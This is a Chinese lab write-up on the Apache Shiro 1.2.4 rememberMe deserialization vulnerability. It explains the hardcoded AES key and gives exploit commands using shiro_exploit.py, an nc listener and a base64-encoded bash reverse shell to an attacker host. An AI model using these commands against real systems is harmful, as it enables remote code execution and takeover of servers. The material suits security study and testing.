Apache Shiro 反序列化漏洞靶场

Apache Shiro 反序列化漏洞靶场,第1张

Apache Shiro 反序列化漏洞靶场 1.漏洞描述

Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。

Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的cookie中。攻击者可以使用Shiro的默认密钥伪造用户cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。

2.漏洞简单分析

Shiro提供了一种下次访问时无需再登录就可访问的功能,即“记住我”功能。Shiro对rememberMe的字段做了加密处理,在cookieRememberMeManaer类中将cookie的字段依次进行序列化->AES加密->base64编码。当需要识别用户身份时,会对cookie中rememberMe字段进行解密,其顺序依次为base64解码->解密AES->反序列化。

在这个过程中,我们发现AES密钥非常关键,但很不幸,密钥被硬编码到了代码中,也就意味着使用shiro组件的业务,其默认的AES密钥都是一样的。因此,攻击者可以构造一个恶意对象,并且进行序列化->AES加密->base64编码后,作为cookie中rememberMe字段进行发送,Shiro将收到的rememberMe字段进行解码、AES解密、反序列化后,最终执行了一个恶意代码,造成反序列化漏洞。

3.漏洞验证

3.1 使用shiro_exploit.py进行利用,尝试写入文件jason123.txt

python shiro_exploit.py -t 3 -u http://192.168.233.134:8080 -p "touch jason123.txt"

3.2 登陆到目标靶机,发现文件成功写入,说明漏洞存在。

4.深度利用

4.1 尝试深度利用,在kali服务器上使用nc监听6666端口

nc -lvp 6666

4.2 使用base64编码进行加密,保证命令成功执行,防止参数被类破坏。

https://jackson-t.ca/runtime-exec-payloads.html

4.3 使用exp执行反dshell

python shiro_exploit.py -t 3 -u http://192.168.233.134:8080 -p "bash -c {echo,"YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIzMy4xMzEvNjY2NiAwPiYx"}|{base64,-d}|{bash,-i}"

4.4 成功获取shell,反d成功

免责声明

严禁读者利用以上介绍知识点对网站进行非法 *** 作 , 本文仅用于技术交流和学习 , 如果您利用文章中介绍的知识对他人造成损失 , 后果由您自行承担 , 如果您不能同意该约定 , 请您务必不要阅读该文章 , 感谢您的配合 !

 

欢迎分享,转载请注明来源:内存溢出

原文地址: https://www.outofmemory.cn/zaji/5721377.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-12-18
下一篇 2022-12-18

发表评论

登录后才能评论

评论列表(0条)

保存